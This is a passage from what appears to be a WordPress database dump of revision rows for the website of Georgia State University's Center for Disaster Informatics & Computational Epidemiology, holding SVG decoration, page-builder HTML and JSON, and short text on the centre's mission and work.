d=\"M526.91,66.87l2.61.91,2.14,1.15,2,1.82,1.4-.44,2-1.44a1.48,1.48,0,0,1,.19-.57l.66-6.21a1.43,1.43,0,0,1-.16-.57l-4.71.66-1,.27-1.9,2.76c-.82-2.42-1.29-3.8-1.75-5.17l-.05-.07C524.76,61.66,526.48,64.39,526.91,66.87Z\" transform=\"translate(0 0)\"\n          opacity=\"0.6\"></path>\n        <path d=\"M699.28,46.12c3.9.2,5-.72,5.5-4.49l-.82-.25C701.9,42.43,699.31,43,699.28,46.12Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M637.78,32.05q-.85,2.46-1.7,4.92c1.48-2,3-1.49,4.48,0L642,34.88c0-.45,0-.9,0-1.35Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M18.44,71.94c-.93-2.4-3-4.37-4.54-6.54.79,2.21-6.73-1-13.9-4.05v8.19C7.73,71.3,20,76,18.44,71.94Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M227.49,59.55a14.62,14.62,0,0,1,5.39.15c3.79.67,7.5,2,11.3,2.29,7.86.56,15.75.58,23.63.85,1.79.06,3.59.2,5.36.43,2.28.29,4.53.71,6.79,1.08a25.57,25.57,0,0,1,3.07-.78c3.39-.47,6.81-.78,10.2-1.29,2.15-.33,2.83.77,3,2.6l1.31.32c5.86-3.59,12-2.37,18.3-1.54a78,78,0,0,1,15.47,4.16c2.66.92,6.07-.34,9.15-.61-.14-.18-.28-.52-.4-.51-5.7.44-11.06-.46-15.85-3.8-.08-.06-.22,0-.33,0-6.14-.46-12.22-1.2-17.88-3.9a4.73,4.73,0,0,0-2.35-.15c-4.42.5-8.83,1.16-13.27,1.57-3.8.35-6-1.15-7.51-4.46-.28-.61-1.05-1.43-1.54-1.4a2.21,2.21,0,0,0-1.5,1.47c-.38,1.81-.48,3.69-.76,6.12-2.94-.82-5.8-1.2-8.24-2.42-2.13-1.07-3.35-.79-5.11.57-1.29,1-3.9,2.11-4.71,1.52-2.88-2.1-5.68-1.35-8.74-1.16s-6-.46-9-.87c-1.75-.25-3.45-.88-5.2-1.13-5.63-.81-11.27-1.61-16.92-2.21-1.55-.16-3.18.41-4.77.64C219.93,58.68,223.34,60.44,227.49,59.55Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M107.68,50.62,109,50l1.34-.16h1.37l3.38.24,7.53.69c3.79-.37,7.58-.94,11.38-1,2.78-.09,5.59.74,8.37.6,4.39-.2,8.66-.6,12.82,1.52,1.39.71,3.31.41,5,.5,5.85.3,11.71.5,17.55.87,5.36.33,10.71.82,16.06,1.29,2,.17,4,.53,6,.67a12.84,12.84,0,0,0,2.58-.33c-3.2-.48-6.38-1.08-9.58-1.41-4-.42-8.2-.17-12.13-1-6.24-1.36-12.38-2.39-18.8-1.53a24.07,24.07,0,0,1-6.73-.53A4.51,4.51,0,0,1,152.65,49c-1.62-2-2.9-4.19-4.57-6.09a4.87,4.87,0,0,0-3.17-1.67c-.6,0-1.54,1.58-1.78,2.58-.85,3.6-2,4.58-5.7,3.95-3-.52-6.07-2.29-8.83.75-.3.32-1.29,0-2,0l-17.77,0c-2.55,0-5.1-.13-7.63.08s-4.86.75-7.29,1.15l11.69,1.71Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M360.25,69.74a19.45,19.45,0,0,0,14.27-2c.71-.37,1.78,0,2.68,0l6.27-.07,2.08-.58,1.19-.92,4.8-1.7c-1-1.37-1.64-3.69-3.93-1.23A12,12,0,0,1,385,64.85c-.33-1-.63-2-1-3a18.81,18.81,0,0,0-1.68-4.41,12,12,0,0,0-3.45-3.06c-1.13-.74-2.77-1.81-3.68-1.45s-1.92,2.22-2,3.47c-.16,3.27.3,6.5,4,8.14l-5.48,2.41L366,69.46l1.26-4.74c-4.21,3.49-8.38,3.43-12.54,2.69.26.7.53,1.4.79,2.09A18.31,18.31,0,0,1,360.25,69.74Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M348.81,67.74c2.05,1.76,4.37,1.82,6.69,1.76-.26-.69-.53-1.39-.79-2.09-1.83-.33-3.65-.78-5.48-1.14-.8-.15-1.81.75-2.73,1.16C347.29,67.52,348.32,67.32,348.81,67.74Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M398.14,57.66c-1.34,1.74-2.11,3.92-3.14,5.9l-.21.18.13.24,4.18-3.2,1.3-.76a16.63,16.63,0,0,0,1.42-3.64c.68-4.85,3.49-7,8.2-6.2.6.09,1.37-.88,2.06-1.36-.95-.27-1.94-.86-2.84-.74-3.33.45-5.75-.55-7.18-3.7a12.14,12.14,0,0,0-1.77-2.05c-2.86,6.11-7.58.56-11.51,2.26a21.74,21.74,0,0,0,5.76,3.5C400,50.22,401.48,53.3,398.14,57.66Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M18,59.82c-3.68-.16-5.72,1.74-4.66,4.33Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1345.25,39.33c.3,0,.55.88.77,1.37.58,1.23,1.13,2.47,1.69,3.7l2.78-5.82-7-6-.67.1C1342.29,35.36,1339.64,38.82,1345.25,39.33Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1348.71,56.82c1.07,2,1.79,1.74,3.33.61.7-.52,2.73-.57,3-.14,2.09,3.45,6.52,5.43,6.51,10.21a2.57,2.57,0,0,0,.77,1.48c4,4.4,9.59,5.64,14.78,7.72-2.36-2.43-1.84-7-6.08-8.1-.31-.08-.28-1.2-.54-1.77a4.87,4.87,0,0,0-1.22-2c-2.44-1.76-3.56-4.63-2.31-7.25.46-1,1.66-1.6,2.52-2.39a10.27,10.27,0,0,1,1.53,2.56c1.57,6.2,2.6,7.28,7.45,7.5l.09,5.57,1.23,0c.27-1.59.53-3.18,1-5.86,3.67,4.78,7.64,5.42,12,3.82.32-2.42.6-4.58.9-6.79l-2.77-.25c2.64-2.3,2.94-6.83,6.84-7.06-.26,2.92-.5,5.68-.78,8.8,1.51-.67,2.58-1.51,3-1.26,2.8,1.75,4.12.21,5.78-1.86,1.06-1.32,2.8-1.86,3.72.87.47,1.39,2.2,3.53,3,3.39a24.34,24.34,0,0,0,7.85-3c.78-.44.74-2.47.89-3.8s.12-2.9.17-4.35l-4.43-3.18-2.82,4.13c-2.88-.62-5.19-1.4-7.54-1.54s-5.25,1.11-7.38.33c-4-1.47-7.74-1.09-12.06.48a60.15,60.15,0,0,0-1.34-6.22,5,5,0,0,0-2-2.32,8.13,8.13,0,0,0-2.6-.63c-4.54-1.08-9-2-13.14,1.33a1.15,1.15,0,0,1-.59.32c-1,0-2.67.35-3-.14a5.71,5.71,0,0,1-.79-3.75,3,3,0,0,1,2.19-1.91c2.28,0,3.34-1.09,3-3.06s-1-4.09-3.92-3.47l1,2.41c-5.2,4-5.45,7-1.59,12.2a7.69,7.69,0,0,1,1.12,4.78,16.93,16.93,0,0,1-2,6.45c-.66-2.71-1.33-5.41-2.15-8.73a12.13,12.13,0,0,1-2,2.32c-.81.54-2,1.24-2.76,1-3.9-1.42-7.57-.73-11.24.69C1346.42,55.58,1348.18,55.86,1348.71,56.82ZM1375,55.71l3.17.95c1.82-1.8,2.31-3.65,1.13-6.07-.37-.74.35-2,.57-3,1,.58,2.29.94,3,1.79a45.93,45.93,0,0,1,3.11,5.31c-2.2,5.44-3.26,6.29-5.41,4.5l-3.89,2.24-2.7-4.92Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1429.65,59.51l3.06-1.52c.23,2.5-1.93,5,1.42,6.94l1.95-4.61,6.73,4.13,2.06-6c2.61,1.08,5.58,1.46,7.18,3.14,2.69,2.82,2.31,3.16,4.89.34a8.88,8.88,0,0,1,1.73-1.1c-.55,1.79-1,3.11-1.36,4.43l.72.38,3.19-1.9,2.57,3.17,3.38-4c2.19,1.56,3.36.64,4.3-1.57a3.45,3.45,0,0,1,2.45-1.77c.65,0,2,1.33,1.92,1.9-.14,1-1.18,1.76-1.85,2.62-.24.31-.52.58-.8.9,2.72,2.6,3.66-1,5.56-1.39l1.82,2.69c3.6-1.56,7.17-2.85,10.48-4.63,2.13-1.15,3.15-.7,4.45,1.1,1.48,2.05,3.51,3.51,7.27,3.65l-3.55-4.65a38.14,38.14,0,0,1,3.73,1.53c4.47,2.55,6.71,2,9.73-2.09a4.21,4.21,0,0,1,2.82-1.14,11.3,11.3,0,0,1,3,.6c1.52.3,3.49.1,4.44,1,.75.71.27,2.73.34,4.33a9.11,9.11,0,0,0,1.13-.48c4.42-2.68,5-2.61,8.87,1a3,3,0,0,0,5-1.65,28.62,28.62,0,0,0,.39-3.35c-1.18-.17-2.38-.28-3.54-.54-.94-.21-2.19-.33-2.69-1-2.81-3.64-7.42-3-11-4.73-.53-.25-1.77,1.16-2.76,1.63-1.19.56-2.6,1.53-3.68,1.29-4.88-1.06-6.15-.72-8.55,3.33l-5.16-.84c1.76-1.94,3.09-3.39,4.34-4.75-1.52-2.92-3.62-2.05-5-.87s-1.88,3.11-3,5.11c.11-3.16-.94-4.58-4.1-4.6-2.37,0-4.7-1.27-7.09-1.67a11.57,11.57,0,0,0-5,.06c-5.69,1.72-11.31,3.2-17.18.85a3.25,3.25,0,0,0-1.64-.14c-4.84.8-9.6,1-14.13-1.42a2.26,2.26,0,0,0-1.89-.12c-3.88,2.49-7.63,1.6-11.47-.11-.83-.37-2.19-.7-2.78-.29a4.61,4.61,0,0,1-5,.26c-1.55-.71-3.2-1.21-5.14-1.92-.25.81-.51,1.61-.76,2.42C1424.18,52.92,1427.59,55.41,1429.65,59.51Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1551.42,67.2c.56-1.29,1-2.54,1.61-3.69,1-1.93,4.37-2.72,5.42-1.28,2.92,4,7,4.8,11.86,4.8-.43-1.29-.75-2.21-1-3l5.34-4.25c2.54,2.71,4.76,5.31,7.28,7.57.67.61,2.35.44,3.42.14a5,5,0,0,0,1.9-1.28c1.89.52,3.92,1.38,4.11,1.08,1.62-2.56,5.43-3.51,5.47-7.21-2.48-.1-5.16-.84-7.4-.15-2.72.84-4.89.35-7.47-.28a38,38,0,0,0-9.55-.55c-2.6,0-5.18.76-7.78.85-3.25.12-6.57-.48-9.76,0-2.3.31-3.86.26-5.24-1.75a3.27,3.27,0,0,0-2.34-.91c-1.65,2.19-3.6,3.28-6.38,2.48-.1,0-.36.5-.55.77l1,6.9C1544.78,64.68,1547.93,65.4,1551.42,67.2Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1639.23,56.13l5,.11c2.64,6.34,6.6,11.29,14.84,10.85-.46,4.49,2,5.65,5.79,5.51,1.84-.07,3.7.16,5.55.25l1.69,4.38,1.21.06,1.76-.72c-.47-1-1-2-1.39-3-1.48-4-2.47-4.47-6.42-3.34a9.44,9.44,0,0,1-2.19.11c-.91-5.38-1.74-6.27-5-5.53-2.64.61-4-.91-3.32-3.67,1.13-4.46.57-5-4.39-5.07-2.74,0-5.27-.5-7-3.14-2.47-3.86-3.72-4.21-8.1-2.84l3.32,1.35Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1623.78,53.05c3.4-.23,6.83,0,10.11,0l2.21-3.28c-.78-.31-1.59-.93-2.34-.86-5,.43-10,1-15,1.55C1619.85,52.5,1621.42,53.22,1623.78,53.05Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1361.67,35.06c-2.1-.64-6.14,1-7,2.88C1357.09,37.24,1360.28,38.33,1361.67,35.06Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1341,50.21l1.76,2.4c1.6-.91,3.2-1.81,4.8-2.73,1.29-.74,2.32-1.54.54-2.86l-6.89,2.85h0Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1339.42,50.35l1.6-.14.21-.34-1.82-.1Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1341.23,49.87h0l-.21.34Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1341.23,49.87h0l-.21.34Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n      </svg>\n    </div>\n    <div class=\"h-section-grid-container h-navigation-padding h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"22-h25\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-213 style-local-22-h25 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-214-outer style-local-22-h26-outer\">\n            <div data-colibri-id=\"22-h26\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-3 h-px-md-3 h-px-3 v-inner-lg-3 v-inner-md-3 v-inner-3 style-214 style-local-22-h26 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-center align-self-md-center align-self-center\">\n                <!---->\n                <div data-colibri-id=\"22-h27\" class=\"h-global-transition-all h-heading style-215 style-local-22-h27 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-215 style-local-22-h27\">\n                    <!---->\n                    <!---->\n                    <h3 class=\"\">Center for Disaster Informatics &amp; Computational Epidemiology</h3>\n                  </div>\n                </div>\n                <div data-colibri-id=\"22-h28\" class=\"h-lead h-text h-text-component style-216 style-local-22-h28 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Enabling Data-Driven Disaster Assessment &amp; Planning\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"22-h29\" class=\"h-x-container style-217 style-local-22-h29 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-x-container-inner style-dynamic-22-h29-group style-217-spacing style-local-22-h29-spacing\"><span class=\"h-button__outer style-218-outer style-local-22-h30-outer d-inline-flex h-element\"><a h-use-smooth-scroll=\"true\" href=\"/about/\"  data-colibri-id=\"22-h30\" class=\"d-flex w-100 align-items-center h-button justify-content-lg-center justify-content-md-center justify-content-center style-218 style-local-22-h30 position-relative\"><!----><!----> <span>Learn More</span></a>\n                    </span>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-220-outer style-local-22-h31-outer\">\n            <div data-colibri-id=\"22-h31\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-3 h-px-md-3 h-px-3 v-inner-lg-3 v-inner-md-3 v-inner-3 style-220 style-local-22-h31 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-center align-self-md-center align-self-center\">\n                <!---->\n                <div data-colibri-id=\"22-h32\" class=\"d-block style-221 style-local-22-h32 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/02/unsplash.jpg\" class=\"wp-image-258 style-221-image style-local-22-h32-image\">\n                      <div class=\"h-image__frame h-image__frame_shadow style-221-frameImage style-local-22-h32-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','header_front_page','','inherit','closed','closed','','22-revision-v1','','','2022-02-16 18:26:09','2022-02-16 18:26:09','',22,'https://gsudice.dataconn.net/?p=384',0,'revision','',0),(388,1,'2022-02-16 18:28:59','2022-02-16 18:28:59','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About\",\"attrs\":{\"id\":\"about\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"122-c4\",\"parentId\":\"122-c3\",\"partialId\":122,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"122-c4\",\"index\":0,\"id\":\"122-c5\",\"partialId\":122,\"styleRef\":288,\"type\":\"content\",\"props\":{\"content\":\"Who are we?\"}},{\"name\":\"hop-heading\",\"parentId\":\"122-c4\",\"index\":1,\"id\":\"122-c6\",\"partialId\":122,\"styleRef\":289,\"type\":\"content\",\"props\":{\"content\":\"The Center for Disaster Informatics &amp; Computational Epidemiology (DICE) at Georgia State University\"}},{\"name\":\"hop-text\",\"parentId\":\"122-c4\",\"index\":2,\"id\":\"122-c7\",\"partialId\":122,\"styleRef\":290,\"type\":\"content\",\"props\":{\"content\":\"<p>... brings together scientists and practitioners from diverse domains to develop computational methodologies that facilitate research in Public Health, Disaster Mitigation, and Response Planning. DICE will enable translational research that enhances population resilience to the adverse impacts of disasters and diseases using data-driven approaches and computational tools and through meaningful engagement with academic collaborators; government, industry, and non-profit partners; and local communities. <\\/p>\"}}],\"styleRef\":287,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"122-c8\",\"parentId\":\"122-c3\",\"partialId\":122,\"styleRef\":291,\"type\":\"content\"}],\"id\":\"122-c3\",\"parentId\":\"122-c2\",\"partialId\":122,\"styleRef\":286,\"type\":\"content\"}],\"id\":\"122-c2\",\"parentId\":\"122-c1\",\"partialId\":122,\"styleRef\":285,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 2\",\"attrs\":{\"id\":\"about-2\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"122-c11\",\"parentId\":\"122-c10\",\"partialId\":122,\"styleRef\":294,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"122-c12\",\"parentId\":\"122-c10\",\"partialId\":122,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"122-c12\",\"index\":0,\"id\":\"122-c13\",\"partialId\":122,\"styleRef\":296,\"type\":\"content\",\"props\":{\"content\":\"What do we do?\"}},{\"name\":\"hop-text\",\"parentId\":\"122-c12\",\"index\":2,\"id\":\"122-c14\",\"partialId\":122,\"styleRef\":298,\"type\":\"content\",\"props\":{\"content\":\"<p>While increasing the level of regional resilience to disasters is paramount, the barriers that limit access to disaster mitigation resources also lead to access disparities in Population Health. Whether determining access disparities that prevent individuals from accessing specific health resources or estimating the risk of exposure to vector-borne diseases, expertise from a multiplicity of scientific domains is required to develop tools that effectively facilitate these efforts. DICE provides the necessary resources for the required collaborations and shall serve as an interface between researchers and practitioners<\\/p>\"}}],\"styleRef\":295,\"type\":\"content\"}],\"id\":\"122-c10\",\"parentId\":\"122-c9\",\"partialId\":122,\"styleRef\":293,\"type\":\"content\"}],\"id\":\"122-c9\",\"parentId\":\"122-c1\",\"partialId\":122,\"styleRef\":292,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Custom\",\"attrs\":{\"id\":\"custom\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"122-c17\",\"parentId\":\"122-c16\",\"partialId\":122,\"children\":[{\"name\":\"hop-heading\",\"slot\":null,\"parentId\":\"122-c17\",\"index\":0,\"id\":\"122-c18\",\"partialId\":122,\"styleRef\":324,\"type\":\"content\",\"props\":{\"content\":\"Our Mission\"}}],\"styleRef\":322,\"type\":\"content\"}],\"id\":\"122-c16\",\"parentId\":\"122-c15\",\"partialId\":122,\"styleRef\":321,\"type\":\"content\"},{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"tablet\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}},\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"100\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-text\",\"id\":\"122-c21\",\"parentId\":\"122-c20\",\"partialId\":122,\"styleRef\":319,\"type\":\"content\",\"props\":{\"content\":\"<p>The Center for Disaster Informatics and Computational Epidemiology (DICE) is a catalyst for collaboration among scientists and practitioners from diverse domains to develop data-driven, computational methodologies that facilitate research to address challenges and disparities in Disaster Mitigation, Public Health, and Response Planning<\\/p>\"}}],\"id\":\"122-c20\",\"parentId\":\"122-c19\",\"partialId\":122,\"styleRef\":318,\"type\":\"content\"}],\"parentId\":\"122-c15\",\"index\":0,\"id\":\"122-c19\",\"partialId\":122,\"styleRef\":317,\"type\":\"content\"}],\"id\":\"122-c15\",\"parentId\":\"122-c1\",\"partialId\":122,\"styleRef\":314,\"type\":\"content\"}],\"id\":\"122-c1\",\"partialId\":122,\"styleRef\":280,\"type\":\"content\"}','','','inherit','closed','closed','','353-revision-v1','','','2022-02-16 18:28:59','2022-02-16 18:28:59','',353,'https://gsudice.dataconn.net/?p=388',0,'revision','',0),(389,1,'2022-02-16 18:28:59','2022-02-16 18:28:59','<div data-colibri-id=\"122-c1\" class=\"style-280 style-local-122-c1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"122-c2\" id=\"about\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-285 style-local-122-c2 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"122-c3\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-286 style-local-122-c3 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-287-outer style-local-122-c4-outer\">\n            <div data-colibri-id=\"122-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-287 style-local-122-c4 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"122-c5\" class=\"h-global-transition-all h-heading style-288 style-local-122-c5 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-288 style-local-122-c5\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">Who are we?</h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"122-c6\" class=\"h-global-transition-all h-heading style-289 style-local-122-c6 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-289 style-local-122-c6\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">The Center for Disaster Informatics &amp; Computational Epidemiology (DICE) at Georgia State University</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"122-c7\" class=\"h-text h-text-component style-290 style-local-122-c7 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>... brings together scientists and practitioners from diverse domains to develop computational methodologies that facilitate research in Public Health, Disaster Mitigation, and Response Planning. DICE will enable translational research\n                      that enhances population resilience to the adverse impacts of disasters and diseases using data-driven approaches and computational tools and through meaningful engagement with academic collaborators; government, industry, and non-profit\n                      partners; and local communities. </p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-291-outer style-local-122-c8-outer\">\n            <div data-colibri-id=\"122-c8\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-291 style-local-122-c8 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"122-c9\" id=\"about-2\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-292 style-local-122-c9 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"122-c10\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-293 style-local-122-c10 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-294-outer style-local-122-c11-outer\">\n            <div data-colibri-id=\"122-c11\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-294 style-local-122-c11 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-295-outer style-local-122-c12-outer\">\n            <div data-colibri-id=\"122-c12\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-295 style-local-122-c12 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"122-c13\" class=\"h-global-transition-all h-heading style-296 style-local-122-c13 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-296 style-local-122-c13\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">What do we do?</h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"122-c14\" class=\"h-text h-text-component style-298 style-local-122-c14 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>While increasing the level of regional resilience to disasters is paramount, the barriers that limit access to disaster mitigation resources also lead to access disparities in Population Health. Whether determining access disparities\n                      that prevent individuals from accessing specific health resources or estimating the risk of exposure to vector-borne diseases, expertise from a multiplicity of scientific domains is required to develop tools that effectively facilitate\n                      these efforts. DICE provides the necessary resources for the required collaborations and shall serve as an interface between researchers and practitioners</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"122-c15\" id=\"custom\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-314 style-local-122-c15 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"122-c16\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-321 style-local-122-c16 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-322-outer style-local-122-c17-outer\">\n            <div data-colibri-id=\"122-c17\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-322 style-local-122-c17 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"122-c18\" 